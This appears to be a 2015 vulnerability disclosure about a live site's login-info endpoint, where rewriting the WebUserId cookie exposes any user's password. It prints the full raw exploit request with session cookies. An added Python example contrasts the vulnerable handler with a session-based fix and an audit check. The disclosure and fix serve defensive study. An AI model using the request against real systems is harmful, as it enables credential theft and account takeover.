
Suzhou Tongcheng six-in-one system: any user's password can be viewed

2015-03-03 05:40

In /AjaxCall.aspx?action=getLogininfojson, changing the WebUserId value lets you view any user's password (you must be logged in yourself).



Code area:
POST /AjaxCall.aspx?action=getLogininfojson&s=0.11141269654035568 HTTP/1.1
Host: www.tycts.com
Proxy-Connection: keep-alive
Content-Length: 0
Accept: */*
Origin: http://www.tycts.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://www.tycts.com/MyInfo.aspx?ordertype=info
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=rxzvlbuanibb1255wvkepjal; BIGipServerwww-51zfx-net-pool=218239148.20480.0000; __guid=75721363.1926000193762423300.1421116669916.0813; BRIDGE_R4310444=http://www.17u.net/ruanjian/partner.html; BRIDGE_REFRESH=5000; baidu_qiao_v3_count_4310444=1; WebUserId=4382242; count=55; BRIDGE_NEED=1; BRIDGE_CLOCK=1421120009902; Hm_lvt_2841fed4a68fb526142569e3f9d05648=1421116670; Hm_lpvt_2841fed4a68fb526142569e3f9d05648=1421120020; CNZZDATA1000282837=2109187164-1421116662-http%253A%252F%252Fwww.17u.net%252F%7C1421116662; VERSION=2,0,0,0; BRIDGE_INVITE_0=0; Hm_lvt_3748d7f8030fc02d4fe81c616d50b2da=1421116670; Hm_lpvt_3748d7f8030fc02d4fe81c616d50b2da=1421120021
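The request above selects the account by the client-controlled WebUserId cookie rather than by the server-side session, which is an insecure direct object reference. The following is an added example, not code from tycts.com or the Tongcheng system: a minimal Python model of such a handler, the vulnerable lookup beside a hardened one that takes the identity from the session store only and never returns the password, plus a server-side audit check that flags requests whose WebUserId cookie disagrees with the session. The user table, session store and function names are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed user table (the real system's storage is unknown).
USERS = {
    4382242: {"login": "alice", "password": "alice-secret"},
    4382243: {"login": "bob", "password": "bob-secret"},
}

# Constructed server-side session store: ASP.NET_SessionId -> authenticated user id.
SESSIONS = {"rxzvlbuanibb1255wvkepjal": 4382242}

# Constructed cookie headers: alice's own session, and the same session with a
# rewritten WebUserId (the pattern the report describes).
ALICE_COOKIE = "ASP.NET_SessionId=rxzvlbuanibb1255wvkepjal; WebUserId=4382242; count=55"
TAMPERED_COOKIE = "ASP.NET_SessionId=rxzvlbuanibb1255wvkepjal; WebUserId=4382243; count=55"


@dataclass
class Request:
    cookies: Dict[str, str]


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Parse a raw Cookie header into a dict; later duplicates overwrite earlier ones."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def get_login_info_vulnerable(req: Request) -> Optional[dict]:
    """Vulnerable pattern: the record is chosen from a client-controlled cookie.
    Login is checked, but *which* account is read is left to the client."""
    if req.cookies.get("ASP.NET_SessionId") not in SESSIONS:
        return None  # caller must be logged in
    try:
        user_id = int(req.cookies.get("WebUserId", ""))
    except ValueError:
        return None
    rec = USERS.get(user_id)
    return None if rec is None else dict(rec)


def get_login_info_fixed(req: Request) -> Optional[dict]:
    """Hardened: identity comes only from the server-side session; the WebUserId
    cookie is ignored and the password is never sent to the client."""
    user_id = SESSIONS.get(req.cookies.get("ASP.NET_SessionId", ""))
    if user_id is None:
        return None
    rec = USERS[user_id]
    return {"login": rec["login"], "user_id": user_id}


def audit_webuserid_mismatch(req: Request) -> bool:
    """Detection signal for the server log: True when the client-supplied
    WebUserId disagrees with the session's authenticated user."""
    session_user = SESSIONS.get(req.cookies.get("ASP.NET_SessionId", ""))
    cookie_user = req.cookies.get("WebUserId")
    if session_user is None or cookie_user is None:
        return False
    return str(session_user) != cookie_user


if __name__ == "__main__":
    tampered = Request(parse_cookie_header(TAMPERED_COOKIE))
    print("vulnerable:", get_login_info_vulnerable(tampered))
    print("fixed:     ", get_login_info_fixed(tampered))
    print("mismatch:  ", audit_webuserid_mismatch(tampered))
```

Two design points: the hardened handler never reads WebUserId at all, so there is no per-field check to forget, and it drops the password from the response because a login-info endpoint has no reason to return one (returning it implies the password is stored in a recoverable form, which is a separate weakness). The audit function is a cheap server-side signal: a session whose WebUserId cookie does not match its authenticated user is exactly the condition the report exploits.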





Proof of vulnerability:

Viewing my own account (screenshots: p1.png, p2.png, p3.png, p4.png)





Fix:

Source: www.wooyun.org/bugs/wooyun-2015-092232
